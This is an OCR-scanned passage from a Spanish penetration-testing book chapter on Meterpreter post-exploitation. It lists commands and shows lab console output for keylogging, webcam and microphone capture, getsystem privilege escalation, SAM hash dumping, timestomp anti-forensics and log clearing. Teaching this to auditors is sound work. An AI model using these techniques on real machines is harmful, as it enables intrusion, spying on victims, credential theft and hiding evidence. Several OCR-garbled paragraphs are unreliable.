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Parapocler  ilustrar  esta  ultima  sentencia  se  propone  un  escenario  como  el  siguiente: 

El  auditor  dispone  de  conectividad  con  una  maquina  con  sistema  operativo  Microsoft 
Windows  XP  vulnerable  y  posee  tambien  los  exploits  necesarios  para  conseguir  aeceso. 

-  El  auditor  no  dispone  de  conectividad  directa  con  una  maquina  con  sistema  operativo 
Microsoft  Windows  Server 2008.  Bntonces,  el  auditor  no  puede  auditar  a  priori  dicha  maquina. 

hi  sistema  operativo  que  utiliza  el  auditor  no  es  relevanie,  pero  se  supone  que  es  una 
distribution  BackTrack. 

-  La  maquina  con  Windows  XP  si  dispone  de  conectividad  con  la  maouina  Windows  Server 
2008. 

Si  el  auditor  vulnera  la  maquina  con  Windows  XP  dispone  de  at  menus  conectividad  con  ei  equipo 
Windows  Server  2008.  A  partir  de  ese  memento  se  puede  auditar  e  intentar  lograr  aeceso  a  dicha 
maquina.  Como  se  vera  mas  adelante  se  pueden  probar  distinlas  tecnicas  para  conseguir  dicha 
accion.  La  i mpersonal izacion  de  usuarios  o  tecnicas  como  el  pivoting  ayudan  y  muciio  al  auditor  en 
este  tipo  de  escenarios. 

En  resu men,  la  fase  de  posi-explotacion  es  tan  extensa  como  importante  en  un  lest  de  intrusion.  El 
auditot  debe  lener  en  cuenta  cual  es  el  objetivo  o  los  objetivos  y  enlonces  realizar  una  planificacion 
pai  a  lograr  estos.  Conocer  el  escenario  es  importante  y  en  esta  fase  se  consigue  mas  infonnacion 
sobre  el  escenario  real  del  que  se  dispone. 


2.  Comandos  Msicos  de  Meterpreter 

Meterpreter  es  un  payload  disponible  para  Metasploit  con  el  que  se  puede  realizar  casi  toda  acciou 
imaginable.  Meterpreter  aporta  una  consola  o  llnea  de  comandos  propia  con  sus  comandos  incluidos. 
Ademas,  puede  ejecutar  sus  propios  scripts  lo  cual  hace  que  aumente  la  polencia  y  posibilidades  que 
olrece  Meterpreter.  Tambien  se  pueden  cargar  modulos  que  aportan  funcionalidades  extra  con  los 
que  los  usuarios  pueden  realizar  mas  acciones. 

Se  pueden  desarrollar  scripts  y  anadirlos  al  framework  de  manera  seneiila.  Esie  hecho  dota  a 
Meterpreter  de  flexibilidad  y  la  posibilidad  de  aumentar  las  luncionalidades  que  el  payload  aporta  a 
los  usuarios.  Es  realmente  dificil  enumerar  todas  las  acciones  que  se  pueden  realizar  con  Meterpreter , 
el  alcance  de  la  imagination  del  usuario  es  realmente  importante. 

La  tecnica  que  se  utiliza  para  ejecutar  un  Meterpreter  en  una  maquina  vulnerada  es  la  inyeccion  en 
memoria  de  DLLs  en  los  procesos  en  ejecucion  del  equipo  vulnerado.  Despues  de  explotar  e!  equipo 
vulnetable  se  cargan  dichas  DLLs  en  el  proceso  vulnerado  y  se  obtiene  una  interfaz  intuitiva  de  llnea 
de  comandos.  Generalmente,  Meterpreter  migra  de  un  proceso  a  otro  para  evilar  que  el  cierre  o  la 
calda  del  proceso  vulnerable  haga  caer  la  conexion  con  la  maquina  atacante. 


Los  comandos  propios  de  Meterpreter  se  estructuran  en  tres  categorias  principales  que  son  las 
siguientes: 

-  Core  commands. 

-  Stdapi 

-  Priv 


Core  commands 

Los  comandos  de  tipo  nucteo  permilen  realizar  distinlas  funciones  basicas  en  la  sesion  en  la  maquina 
remota.  El  objetivo  de  estos  comandos  es  el  de  ejecutar  scripts,  cargar  modulos  e  interactuar  con  ia 
maquina  remoui. 

En  la  imagen  se  puede  visuaiizar  ei  listado  complete  de  ios  comandos  de  tipo  nueleo.  Mas  adelante 
.|.e  estudiaran  tas  distiiitas  acciones  que  se  pueden  realizar  con  eilos  agrupandose  por  tipos  de 
funcionalidades  que  presentan. 


:ore  ConiiBands 

l~..y.*T  sssagar.. . . . .  . . 

Command 

Description 

? 

Help  menu 

background 

Backgrounds  the  current  session 

bgkill 

Kills  a  background  meterpreter  script 

bglist 

Lists  running  background  scripts 

bgrun 

Executes  a  meterpreter  script  as  a  background  thread 

channel 

Displays  information  about  active  channels 

close 

Closes  a  channel 

exit 

Terminate  the  meterpreter  session 

help 

Help  menu 

info 

Displays  information  about  a  Post  module 

interact 

Interacts  with  a  channel 

irb 

Drop  into  irb  scripting  mode 

load 

Load  one  or  more  meterpreter  extensions 

migrate 

Migrate  the  server  to  another  process 

quit 

Terminate  the  meterpreter  session 

read 

Reads  data  from  a  channel 

resource 

Run  the  commands  stored  in  a  file 

run 

Executes  a  meterpreter  script  or  Post  module 

use 

Deprecated  alias  for  'load' 

write 

Writes  data  to  a  channel 

Fig  4.01 :  Listado  de  cure  commands  dc  Meterpreter. 


Comandos  para  la  ejecucion  en  segundo  piano 

Existen  varios  comandos  que  permilen  al  usuario  ejecutar  scripts  de  Meterpreter  en  segundo  piano. 
El  comando  bgkill  pennite  al  usuario  eliminar  un  script  de  Meterpreter  que  se  este  ejeculando.  El 
comando  bglisl  permite  listar  los  scripts  de  Meterpreter  que  se  estan  ejecutando  actualmente,  y  por 
ultimo  el  comando  bgrun  permite  ejecutar  un  script  de  Meterpreter  en  segundo  piano. 
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Hoy  que  tener  cn  cuenla  la  extend*  del  comando  background  e.|  ctral  permite  dejar  la  sesidn  de 
■eerpie/a  en  segundo  piano  y  volver  a  la  interaction  con  la  Interfax  de  Metasvioit  qne  sc  este 
umiznneo,  por  ejemplo,  ms/console  o  msfcli. 

Bn  la Imogen  se  puede  visualizar  como  se  ejecuta  un  script  denominado  kevlogrecorder,  d  end 
perimte  rea tear  captures  de  las  pulsaciones  de  teclado  de  la  maquina  vulnerada.  Se  puede  visualizar 
u  ™  °e  UJ,l/"n  los  dlsl,nlos  comandos  para  listar  los  trabajos  en  segundo  piano  y  finalizarlos. 

(isetexa .C£ter bg run  keylog recorder  -  - - — - - - 

Id  Executed  Meterpreter  with  Job  ID  2 

M^SSon  ILmT""--  Pr°CSS£  ,CUnd-  •i9ratl"3  int°  ™ 

id  Starting  the  keystroke  sniffer... 

Mtoystrotes  tel,,,  saved  in  to  /n.ot/.«sf3/io9s/scriptS/keylogrecorder/192.MS.e.57_2ai288ta.l 
M  Recording 

■fits mater  >  bgtist 
f*'l  Job  2:  f "keylogrecorder"] 
meteroreter  >  bglist 
(d  Job  2:  ["keylogrecorder"] 

IS terp refer  >  bgkill  2 

1*1  Killing  background  job  2... 

Fig  4.02:  Ejection  do  los  background  commands . 

Ejecudones  y  cargas 

Para  realizar  ejecudones  de  scripts  o  cargar  modulus  que  proporcionen  nuevas  ftmcionalidades 

a  Meterpeer  o  mcluso  ejecutar  los  ficberos  de  extensMn  RC  para  automatizar  tareas  se  pueden 
vitilizar  distmtos  comandos. 

encuentra  en  desuso  y  es  equivalent,  al  comando  bad  con  el  que  se  pueden  cargar 
modulos  par.  Meterpreter.  El  comauao  resource  permite  ejecutar  archives  de  automatization  los 

oda  Crh^T  SCT  SOn  Una  * ,as  partes  ™s  Mantes  *  1“  herramienta  por 

.uda  la  luucionalidad  que  aportan  y  el  constante  desarrolio  de  estos  por  la  comunidad. 

Comandos  dc  aynda 

Los  comandos  de  ayuda  e  mformaddn  de  los  que  dispone  Meterpreter  son  los  siguientes: 

-  help.  El  cual  muestra  informacita  de  uso  del  comando  del  que  se  requiem  informneidn 
m"°\™ "]eS  "°  "  *"""*»  disponible  ayuda  del  comando  a  travis  de  help,  es  Por  ello  que 
y  q  J=CUtar  el  corafmao  del  que  se  requiere  information  con  el  parametro  -I,  active. 

El  comando  7  proporciona  una  ayuda  similar  a  la  del  comando  help. 

Interaccion  y  uso  de  canalcs 

El  comando^no  es  un  comando  de  tipo  nficleo  o  corn  command,  pero  se  utiliza  para  ejecutar 
una  aplicacion  en  la  maquma  vulnerada,  es  decir,  en  el  equipo  remote.  Como  se  puede  visualizar  en 
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la  imagen,  con  este  comando  se  pueden  ejecutar  aplicaciones  en  la  maquina  remota.  Este  comandt 
se  expiicara  mas  adelante. 

Una  vez  que  Meterpreter  ha  ej&cutado  un  proceso  en  la  maquina  remota  se  puede  interactuar  con 
este  a  traves  de  la  linea  de  comandos.  Por  ejemplo,  con  ci  comando  execute  se  ha  lanzado  una'pmei 
en  ia  maquina  remota  y  como  se  ha  ejecutado  execute  con  el  parametro  -c  se  ha  creado  un  canal  por< 
el  que  se  podra  interactuar  con  dicho  proceso. 

El  comando  channel  permite  conocer  los  canales  que  se  encuentran  activos,  e  incluso  con  los 
parametros  -r  y  -w  es  posible  leer  la  salida  del  proceso  correspond iente  y  escribir  en  dicho  proceso.^ 
b.i  comando  read  es  equivalente  a  utilizar  la  instruccion  channel  -r,  mientras  que  el  comando  writei 
es  compatible  con  ia  instruccion  channel  -w. 


!Dfiterp_re(er  >  execute  -f  cmd . exe  -H  -c 
Process  1096  created. 

Channel  1  created. 
meterureter  >  channel  -l 

Id  Class  Type 

1  3  stdapiprocess 

meterpreter  >  read  1 
Read  104  bytes  from  1; 

Microsoft  Windows  XP  [Versitn  5.1.2680] 

(C)  Copyright  1985-2601  Microsoft  Corp. 

C:\WIND0WS\system32> 

Wterpreter  >  write  l 

Enter  data  followed  by  a  ’ . ’  on  an  empty  line 


E*J  Wrote  5  bytes  to  channel  1. 
meterpreter  >  read  1 
Read  11  bytes  from  1; 


:\> 

j meterpreter  >  §  I 


Fig  4.03:  Interaccion  con  el  canal  creado  en  un  proceso. 


El  comando  interact  permite  interactuar  con  el  proceso  ejecutado  en  la  maquina  remota,  simplemente 
indicando  el  identificador  del  canal  que  hay  abierto  con  el  proceso  remoto,  En  el  caso  del  proceso 
cmd.exe  abierto  anteriormente  se  debe  ejecutar  la  instruccion  interact  <idcanal>  para  poder  escribir 
en  la  Hnea  de  comandos  remota. 


Stdapi 

Este  tipo  de  comandos  permiten  al  usuario  realizar  acciones  comunes,  que  cualquier  itsuario  puede 
ejecutar  en  el  sistema  operativo  que  utilizan,  sobre  el  sistema  operativo  de  la  maquina  remota, 
Existen  distintas  categorlas  de  comandos  de  tipo  stdapi  que  son  las  siguientes: 


Metasploil  para  Pentesters 


-  File  System  Commands.  Los  comandos  del  sistema  de  arehivos  permiten  al  atacante  o 
auditor  realizar  operaciones  sobre  tos  archives  ianto  remotos  conic  locales. 

-  Networking  Commands.  Los  comandos  de  red  permiten  al  usuario  realizar  consultas  y 
gestionar  los  dispositivos  de  red  de  la  maquina  remota. 

-  System  Commands.  Los  comandos  de  sistema  permiten  gestionar  rccursos  del  sistema. 

-  User  Interface  Commands.  Los  comandos  de  interfaz  do  usuario  permiten  realizar 
acciones  sobre  el  cscrilorio,  captura  depulsaciones  de  teclado,  capturade  pantalia  o  el  tiernpo 
de  inactivkiacl  del  sistema. 

-  Webcam  Commands.  Estos  comandos  permiten  grabar  del  microl'ono  del  equipo  remoto 
si  lo  hubiera,  1  [star  las  webcams  disponibles  en  la  maquina  remota  o,  incktso,  reaiizar 
(olografias  de  la  vlctima  con  la  webcam. 

File  System  Commands 

El  listado  de  comandos  para  realizar  operaciones  sobre  ei  sistema  de  archive,  lanto  local  como 
remoto  se  puede  visualizar  en  la  siguiente  imagen. 


Stdapi:  File 

system  Commands  j 

. .  i 

CoiMisnd 

Description 

cat 

Read  the  contents  of  a  file  to  the  screen 

cd 

Change  directory 

del 

Delete  the  specified  file 

download 

Download  a  file  or  directory 

edit 

edit  a  file 

qetlwd 

Print  local  working  directory 

getwd 

Print  working  directory 

led 

Change  local  working  directory 

Ipwd 

Print  local  working  directory 

Is 

List  files 

mkdir 

Hake  directory 

pwd 

Print  working  directory 

rsi 

Delete  the  specified  file 

rmdir 

Remove  directory 

search 

Search  for  files 

upload 

Upload  a  file  or  directory 

Fig  4.04:  Lislado  de  file  system  commands  de  Meterpreter. 


Como  curiosidad  indicar  que  los  comandos  ciasicos  de  GNU/Linux  estan  disponibles  para  el  sistema 
remoto.  Es  decir,  la  ejecucion  de  Is,  que  es  un  comando  no  valido  en  Windows,  provoca  la  obtencion 
del  listado  de  archives  de  la  maquina  Windows  vulnerada. 

Hay  que  destacar  los  comandos  upload  y  download  con  los  que  se  puede  subir  un  archivo  a  la 
maquina  vulnerada  y  descargar  un  archivo  de  la  maquina  vlctima.  Como  se  puede  visualizar  en  la 
imagen  siguiente  la  sintaxis  de  estos  comandos  es  realmente  sencilla. 

Tambien  es  inieresante  ver  los  comandos  rm,  mkdir,  rmdir,  edit  que  son  faciimente  entemlibles.  El 
comando  search  permite  realizar  busquedas  de  ficlieros  en  el  equipo  remoto.  Search  dispone  de 


Capitulo  IV  Meterpreter  &  Post-Explolaiion 


parametros  para  afinar  las  busquedas,  por  ejemplo  con  el  parametro  -f  se  pueden  buscar  pairones  de 
ficheros,  eon  ei  parametro  --d  se  pueden  realizar  busquedas  de  directorios,  unidades,  etcetera. 


metercreter  >  upload  /root/hack.txt  c:\\ 

I*]  uploading  :  /root/hack.txt  ->  c:\ 

L]  uploaded  :  /root/hack.txt  -»  c:\Vhack.txt 
metercreter  >  cat  c: \\hack.txt 


prueba 

seteror^ter  >  download  c:\Xclaves.txt  /root 

{«j  downloading:  c:\claves.txt  ->  /root 

Li  downloaded  :  c:\claves.txt  /root/claves.txt 


Fig  4.05:  Subilia  y  ciescmga  dc  arehivos  a  la  maquina  vulnerada. 


Networking  Commands 

El  listado  de  comandos  para  realizar  las  gestiones  de  red  se  puede  visualizar  a  eoniinuacion. 


Stdapi:  networking  Commands 

Command 

Description 

ipconfig 

Display  interfaces 

portfwd 

Forward  a  local  port  to  a  remote  service 

route 

View  and  modify  the  routing  table 

Fig  4.06:  Listado  de  comandos  para  geslidn  de  red  con  Meterpreter. 


El  comando  route  permite  visualizar  y  manipular  ias  entradas  de  la  tabla  de  rutas  del  equipo  remoto. 
Por  otro  lado,  el  comando  ipconfig  permite  visualizar  la  configuracion  de  red  de  la  maquina  remota. 
El  comando  porifwd  permite  realizar  port  forwarding  sobre  la  maquina  vulnerada. 

System  Commands 

Los  comandos  de  sistema  son  realmente  utiles  e  interesantes.  Son  de  los  comandos  de  Meterpreter 
mas  utilizados  por  los  usuarios  ya  que  proporcionan  gestion  del  sistema  vulnerado.  A  eoniinuacion 
se  puede  visualizar  un  listado  de  los  comandos  de  sistema  de  Meterpreter. 


{stdapi :  System  Commands 

Command 

Description 

clearev 

Clear  the  event  log 

drop  token 

Relinquishes  any  active  impersonation  token. 

execute 

Execute  a  command 

getpid 

Get  the  current  process  identifier 

getprivs 

Attempt  to  enable  all  privileges  available  to 

the  current  process 

getui-J 

Get  the  user  that  the  server  is  running  as 

kill 

Terminate  a  process 

ps 

List  running  processes 

reboot 

Reboots  the  remote  computer 

reQ 

Modify  and  interact  with  the  remote  registry 

rev2self 

Calls  RevertToSelfl)  on  the  remote  machine 

shell 

Drop  into  a  system  command  shell 

shutdown 

Shuts  down  the  remote  computer 

steal  token 

Iftttempts  to  steal  an  impersonation  token  from 

the  target  process 

sysinfo 

Gets  information  about  the  remote  system,  sudi 

i  as  OS 

Fig  4.07:  Listado  de  comandos  de  sistema  de  Meterpreter. 


Me  (asp /oh  pgrg  Peniesters 


Hay  qne  deslacar  ciertos  comandos  del  listado  como  es  clears  ™„  ..  „ ,  ,  . 

sSS~==s=====SSS 

ipps=s= 

comando  Ikv,,  til '  *  '*  *****  "****'  P°'' '°  SU  ft,ncionali"  «  similar  a  I,,  « 

I;0S  comandos  kill  y  ps  permiten  eliminar  procesos  que  se  estan  ei-cntmHr.  ani,  -  ■ 

“ie-  r  t  ,n“ 

apagaHf;  inaquina  I’emota'respectivmaente! CUCn  a  SOn  re^901  y  shutdown,  que  permiten  relniciar  y 

IS liZ^Z°Z°ZZndlT<a  ParS  POde''  :teraCtUar  C°"  d  "«*•  *  <*  mdquina 

cnmandos  que  recibe  reg:  parametmss.  A  conhnuacion  se  especifican  los  tipos  de 

“  Este  comando  enumera  o  fista  e!  contenirto  ,u  „ 

ejemplo  se  ptesenta  la  siguie.de  instntccibn:  ,,8  enuZ  1  ^ 

'^ZZZkZZ: h  entrada  *■  * <*-  *■*  -  p~ 

-  Query  class.  Consult?,  ei  tipo  de  la  clave. 

la  m4™!T remote  De^te  modo'seTT'l  -”e  pr0p°rcio,,a  am  lfnca  de  comandos  sobre 
nsical„tee„  el  1™  Puede  admi„,strar  el  equipo  remote  como  si  se  estuviera 

S  ei  ZZSSZ:  it™016" SObre  el  SiS,ema  information 
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User  interface  Commands 

Los  comandos  de  interaction  con  !a  Interfaz  de  usuario  proporcionan  al  atacante  la  posibilidad  or 
gestionar  propiedad.es  del  escritorio,  el  teclado  y  el  propio  sistema  asf  como  la  actividad  de  este 
i-stos  comandos  pueden  ser  visualizados  en  la  siguiente  imagers. 


{stdapi:  User  interface  Commands 

r=?KSS«K;a=r5;«stxs;  * 

Comwand 

Description 

emimdesktops 

U.sf  all  accessible  desktops  and  window  stations 

gel  desktop 

Get  the  cuirent  raeterpreter  desktop 

idletiwe 

Returns  the  number  of  seconds  the  remote  user  has  been  idle 

keyscenjiiiiiip 

Dump  the  keystroke  buffer 

keysennstart 

Start  capturing  keystrokes 

j  keysL-an_stop 

Stop  capturing  keystrokes 

i  screenshot 

Grab  a  screenshot  of  the  interactive  desktop 

|  setdesktop 

Change  the  meterpreters  current  desktop 

[  nictl 

Control  some  of  the  user  Interface  components 

f  ig  4.08:  Listado  de  comaiulos  pan;  gestionar  la  interfaz  de  usuario  de  Meterpreier. 

v,abe  deslacar  el  comando  idletime  con  el  que  se  puede  consultar  ei  tiempo  de  inactividad  del  sistema 
per  paste  oe  la  victima,  cs  decir,  el  tiempo  que  la  victima  I  leva  sin  utilizar  su  sistema. 

Los  comandos  que  empiezan  por  key scun  proporcionan  control  sobre  el  teclado  de  la  victima.  Cor 
e!  comando  keyscanjtari  se  empiezan  a  capturar  las  pulsaciones  de  teclado  del  equipo  vulnerado, 
mientras  que  con  keyycan  stop  se  dejan  de  capturar  dichas  pulsaciones.  El  comando  keyscan  dump 
obiiga  a  Meterpreier  a  realizar  tin  voicado  del  buffer  donde  estan  contenidas  ias  pulsaciones  en  la 
maquina  victima. 

Con  ei  comando  screenshot  se  obfiene  una  captura  de  pantalla  de  la  maquina  de  la  victima..  E 
nr  chi  vo  resuiiarite  es  deseargado  automaficamente  per  Meterpreier  y  alojado  en  la  carpeta  donde  se 
este  eject! tando  Merasplvh,  por  ejempio  /rcotl<nomhre  aleatorio>.jpg. 

Webcam  Commands 

Los  comandos  stdapi  de  tipo  webcam  son  muy  visiosos  ya  que  realizan  acciones  sobre  el  microfonc 
y  ia  webcam  oe  ti  n  equipo  vulnerado.  Ei  listado  de  comandos  se  puede  visitaiizar  a  continuation. 


Stfiapi:  Webcam 

Commands 

Command 

Description 

record  mic 

Record  audio  from  the  default  microphone  for  X  seconds 

webcam_list 

List  webcams 

webcam  snap 

Take  a  snapshot  from  the  specified  webcam 

Fig  4.09:  Listado  dc  comandos  relacionados  con  el  miciofono  y  la  webcam. 


El  comando  record jnisc  dispone  de  varios  parametros  interesantes.  El  parametro  -d  indica  el 
mimero  de  segundos  que  se  grabaran  en  la  maquina  remota,  hay  que  tener  en  cuenta  que  por  defeclo 
es  l  segundo.  El  parametro  -f  indica  en  que  ruta  de  la  maquina  del  atacante,  es  decir  la  ruta  local,  se 
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almacenara  la  grabacion.  El  parametro-p  indica  si  automatieamente  se  ejecutara  el  archivo  de  audio 
tias  la  giabacion,  por  defecto  viene  activado. 

El  comando  webcam Jist  permite  obtener  un  listado  de  las  webcam  dispombles  en  la  maquina 
ulneiada.  En  caso  de  diaponer  de  una  webcam  en  la  maquina  remote,  se  puede  utilizar  el  comando 

abcamrinaP  con  el  ol’jetivo  de  reaiizar  fotografias  de  la  victima.  Este  comando  dispone  de  dislintos 
parametros  que  aportan  funcionalidad  al  comando. 


b,to,-mTi!ld0S  dim6Mo»™  Pr0P°lci0Mn  ftncionalidades  para  eievar  privilegios,  maaipalar 

' nnZT  e  que  Ser  “  P°1' un  <**“«*»  fore"se  7  otras  areas  de  inter*, 

cotuo  es  la  mampulacion  del  fichero  SAM,  Security' Account  Manager. 


3riv:  Eleyate 

Commands  " 

Command 

Description 

getsystem 

Attempt  to  elevate  your  privilege  to  that  of  local  system. 

T  .  '  , 

>rivi  Password  database  Commands; 

Command  • 

Description 

liashdump 

Dumps  the  contents  of  the  SAM  database 

priv!  Timestomp  Commands 

Command 

Description 

timestomp 

Manipulate  file  MACE  attributes 

Ehoodulo  se  divide  en  ties  categories,  que  permiten  reaiizar  diversas  acciones.  Dichas  categorias 

Elevate  Commands.  Realiza  elevaciones  de  privilegios  eu  el  sistema  vulnerado. 

-  Password  Database  Commands.  Obtiene  informacion  sobre  usuarios  y  contrasenas. 

-  Timestamp  Commands.  Realiza  la  manipulation  de  los  atributos  de  los  archivos. 

Elevate  Commands 

El  comando  getsysim  permite  reaiizar  intentos  para  eievar  privilegios  en  el  sistema  vulnerado  Con 
sistemas  Hi mlows  XP  se  conseguira  reaiizar  esta  operativa  de  manera  sencilla,  pero  si  el  usuario 
se  encuentra  con  Windows  7  la  elevation  de  privilegios  supone  un  relo  mayor,  el  cual  se  vera  mas 
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Beterpratgr  >  getuid 

Server  username:  PRUEBAS-01760CC\Ad!nini5trador 

interpreter  >  getsystem 

...got  system  (via  technique  1). 

neterp refer  >  getuid 

Server  username:  NT  AUTHORITY’S  SYSTEM 


evucion  de  privilegios  en  un  sistema  Windows  XP  vulnerado. 


Password  Database  Commands 

El  comando  Imshdump  ofrece  la  posibiiidad  de  obtener  los  hashes  y  usuarios  que  se  eucueiilran  en 
el  sistema,  Como  se  vera  mas  adelanle  esta  informacion  es  importante  cuando  se  requicre  utilizar  la 
im personal izncion  de  usuarios. 

interpreter  >  hash dump 

Administrador: 503 : 8735172c3a77d2c6aad3b435b51404ee ; 512b99009997c3b5588ca  fac9*:08e969 : : : 
Asistente  de  ayiida:lQe0:317dd0337ea2d549dc6743cd7ee77792:eIeclbc581f420f3a09579442879965d: : : 
invitadG:50i:aad3b435b51404eeaad3b435b51484ee:31d6cfe0dl6se931b73c59d7e8c089c0: : : 
pepe: 1083:8735172c3a77d2c6aad3b435b5I404ee:512b990G9997c3b5588cafac9c0ae969: : : 
SUPP0RT_388945aQ:1002:aad3b435b51404eeaad3b435b51404ee:3cb0da961c4388978ebcc9440e725954: : : 
interpreter  > 

Fig  4.12:  Volcado  de  usuarios  y  hashes  de  la  SAM. 


Timestomp  Commands 

El  comando  timestomp  permite  manipular  los  atributos  de  un  fichero  del  sistema  vulnerado.  /,Con 
que  fin?  Principalmentc,  se  busca  reaiizar  tin  antiforensics  con  ei  que  las  pistas  dejadas  en  el  equipo 
queden  confusas  e  incongruentes. 

El  comando  implementa  gran  variedad  de  opciones  que  se  listan  a  continuation: 

-  Modificacidn  del  ultimo  acceso.  Para  tlevar  a  cabo  esta  action  se  debe ejecutar  la  siguiente 
instruccio n  timestomp  <rutaJkhero  remoto>  -a  "12/22/1986 12:12:34 ".  El  formato  de  fecha 
va  entrc  comil  las  y  tiene  dos  campos,  el  primero  es  la  fecha  con  el  formato  MM/DD/YYYY. 
y  el  segundo  es  la  hora  con  formato  HH:MM:SS. 

-  Fecha  de  creation  del  archivo.  Se  puede  modificar  la  fecha  de  creation  del  archivo  a  traves 
de  la  siguiente  instruccion  timestomp  <rula  fichero  remoto>  -c  "12/22/1986  13:05:57 

-  Fecha  de  modificacion.  Se  puede  modificar  esta  fecha  con  la  siguiente  instruccion 
timestomp  <ruia  fichero  remoto>  -m  "12/22/1986  23:23:12 

-  Forzar  modification  de  todos  los  campos  anteriores.  Para  asignar  ia  misma  fecha  a  los 
campos  de  ultimo  acceso,  modificacion  y  creacidn  se  dispone  de  la  siguiente  instruccion 
timestomp  <ruta  fichero  remoto>  -z  "12/22/1986  22:34:54”. 

-  Visualization  de  los  atributos.  Para  visualizar  los  atributos  de  un  fichero  del  equipo 
remoto  se  ejecuta  la  siguiente  instruccion  timestomp  <ruta  fichero>  -v. 

-  Para  ejecutar  una  operation  sobre  los  atributos  de  un  directorio  cie  manera  recursiva  se 
dispone  de  la  siguiente  instruccion  timestomp  <rula  fichero>  -r. 


Met  asp  hit  para  Pentcsters 


fieterprebr  >  ifmpgTnwn' 


Modified 
Accessed 
treated 
(entry  Modified 


2012-00-28  18:44:58  +0200 
2012-08-29  14:30:24  +6200 
1986-12-22  12:12:34  +0106 
2012-60-29  14:28:31  +6206 


>  timestomp  c:\\hack.txt  -e  “12/22/1986  12:12-34“ 
'  5  Setting  specific  MACE  attributes  mi  c:\hack  txt 
ptergreter  >  timestoinp  c:\Vhack.txt  -v 
pdi fied  :  2012-08-28  18:44:58  +9280 
(Accessed  :  2012-08-29  14:36:24  +0200 

S treated  :  1986-12-22  12:12:34  +0160 
ntry  Modified:  1986-12-22  12:12:34  +0100 
ejerjareter  >  timestomp  c:\Xhack.txt  -m  “12/22/1986  12-12-34" 
*J  Setting  specific  MACE  attributes  on  c:\hack  tx* 
gteipreter  >  timestomp  c: Whack,  txt  -v 
Odified  :  1986-12-22  12:12:34  +0100 
rcessed  ;  2012-08-29  14:34:32  +0206 
Created  :  1986-12-22  12:32:34  +0100 
entry  Modified:  1986-12-22  12:12:34  +0100 
ligterpreter  >  timestomp  c:\Xhack.txt  -h 

Jsage;  timestomp  file  path  OPTIONS 

Fig  4.13:  Manipulation  cie  atributos  de  un  fichero  en  ei  equipo  remote. 


rfS  1?  '  ,  de  Sys  <,Ue  se  ',lreoen  e-leci,to  P“  Meterpreter  en  la  miSquina  vulnerada 

. .  -rr°  ara  conocer  que  scHp,s  hay  disp°nib|es «• <»» de  .a 

ilebe  eso  ibir  ei  comando  run  y  mediante  el  uso  del  tabulator  para  autocomptotar  se  mostr  irb  „n 
mensajc  con  todas  las  posibilidades  que  se  disponen.  ' 


Interpreter  >  run 
pisplay  all  189  possibilities?  (y 
run  arpscanner 
run  autoroute 
run  checkvm 
run  c red collect 
run  domainjist  gen 
run  dumpUnks 
run  duplicate 
rim  enuin_chrome 
run  enunffi refox 
run  enuiit  logged_on_users 
Iron  enum  powershell  env 
(run  enum  putty 
fufi  eiium  shares 
jrun  enum  vmware _ 


run  eventjnanagcr 
or  n)  run  file_eoliector 

run  get_ application  list 
run  get  env 

run  getjiiezilla  creds 
run  getlocalsubiiets 
run  get  pidgin  creds 
run  get_valid_c()«uinity 
run  getcountermeasure 
run  getgui 
run  gettelnet 
run  getvncpw 
run  hashdurap 
run  hostsedit 
run  keyiogrecorder 
_ run  kills v 


1‘ig  4. 1 4:  Visualizar  listado  de  scripts  disponibles  en  vina  sesitir  de  Meterpreter. 


Alganos  scripts  realizan  ftmeionalidades  similares  a  las  de  algunos  comandos  comentados 


Capituio  IV.  Meterpreter  &  Post-Expiotation 

Los  scripts  son  desarrollados  por  la  eomunidad,  lo  que  hace  que  existan  gran  cantidad  de  elios 
Algunos  se  pueden  obtener  mediante  subversion  y  otros  es  obligatorio  hacerlo  de  manera  manual 
En  la  ruta  /pentest/exploits/framework3/scripts/meterpreter  se  dispone  de  gran  cantidad  de  script A 
de  este  payload  tan  especial.  Los  scripts  que  vienen  con  Metasploit  depende  de  la  version  que  se* 
oblenga  del  producto  y  las  aclualizaciones  que  vaya-n  surgiendo  de  este. 

winenum:  el  informador 

.  Bste  script  es  el  mas  completo  para  la  recopilacion  de  informacion  de  la  maquina  vulnerada.' 
Bos  resultados  se  almacenan  en  la  maquina  del  atacaiite  en  la  rula  /roo t/ msft /logs/scripts ,  o  si 
framework  es  la  version  4  la  ruta  sens  /root/ msf4/logs/scrip ts , 

I 

winermm  realizn  numerosas  acetones,  entre  las  que  destacan  lanzar  gran  cantidad  de  ordenes  de  llnetk 
de  comartdos  y  de  ordenes  de  WMf,  obtener  un  listado  de  aplicaciones  que  se  eneuentren  instaiadas 
en  ia  maquina  vuinerada,  realizar  tin  volcado  de  los  hashes  de  la  maquina,  obtener  un  listado  de^ 
tokens,  etcetera. 


meterpreter  --  run  winenum  '  1  ‘  - - - - - — 

l*j  Running  windows  Local  Enumerion  Meterpreter  Script 
[’!  New  session  or,  192.168.0.59:445... 

f+]  Saving  general  report  to  /root/.msf4/logs/scripts/winenuin/PfUJEBAS-Q17O0CC  20120829. 5430/PtUiF 
BAS-01760CC_20120829.5430.txt  “ 

[*1  0utPat  of  each  individual  command  is  saved  to  /root/.msf4/logs/scripts/winenuR/PPl'E8AS-01760 
CC  20120829,5430 

f *T  Checking  if  PWJE8AS-B1760CC  is  a  Virtual  Machine . 

■  [«]  UAC  is  Disabled 

(*1  Kunning  Command  List  ... 

I*]  running  command  net  view 

(*]  running  command  netstat  -nao 

l*]  running  command  netstat  -vb 

l’]  running  command  netstat  -ns 

(*)  running  command  net  accounts 

[*}  running  conuaanci  route  print 

f*3  running  command  ipcorifig  /displaydns 

1*1  running  command  arp  -a 

1*1  running  command  ipconfig  /all 

1*1  running  command  cmd.exe  /c  set. 

;  f ♦]  running  command  net  loealgroup  administrators 

[*}  running  command  net  group  administrators 

1*1  running  coirimand  net  view  /domain 

(*3  running  command  netsh  firewall  show  config 

{*•]  running  command  tasklist  /sve 

j(*l  running  command  net  loealgroup 

1*1  running  command  net  user 

[*)  running  command  net  group 

[*1  running  command  net  share 

1*1  running  command  net  session 

I*)  running  command  qpresult  /SCOPE  USER  /Z _ 

Fig  4  15:  Ejecueion  del  script  winenum. 

La  ejecucion  de  winermm  proporciona  gran  cantidad  de  archives  como  se  puede  visualizar  en 
la  imagen.  Esta  informacion  se  almacena  en  la  riita  /woi/.msf3/logs/scripts/winenuin/<nombre ' 
maquina>.  Esta  cantidad  de  informacion  puede  ayudar  ai  auditor  a  comprender  el  estado  de  la 
maquina  y  de  su  entorno  real.  A  continuacion  se  puede  visualizar  una  tabla  distribuida  por  contenido 
y  los  archivos  que  se  pueden  encontrar. 


Cap  Uni o  IV.  Meterpreier  &  Post-Explotation 


